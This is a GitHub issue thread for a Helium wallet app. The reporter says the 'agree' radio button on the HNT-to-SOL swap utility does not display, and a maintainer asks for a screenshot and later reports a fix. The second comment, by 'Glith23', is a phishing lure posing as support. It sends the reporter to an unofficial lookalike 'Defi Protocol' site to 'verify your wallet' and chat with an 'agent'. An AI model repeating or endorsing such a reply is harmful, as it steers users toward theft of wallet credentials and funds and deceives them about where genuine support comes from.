### ISSUE TITLE
helium swap utulity "agree" radio button inaccessible

### ISSUE THREAD

**Issue by daringanitch** [helium/wallet-app#410]
the formatting is off on the helium swap utility, the radio button for agreeing to helium to sol swap is not displayed on the page. please fix

**Comment by Glith23** [comment]
> the formatting is off on the helium swap utility, the radio button for agreeing to helium to sol swap is not displayed on the page. please fix

Hi @daringanitch  
Visit the official Defi Protocol page to verify your wallet under validation to complete your request for you eligibility purpose via [Defi Protocol](https://defiproconect.online/defiprotocol/v1/defi/home/).
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.

**Comment by ChewingGlass** [comment]
Can you provide a screenshot? And device information? It shows on my screen.

**Comment by ChewingGlass** [comment]
I think this should be fixed now.
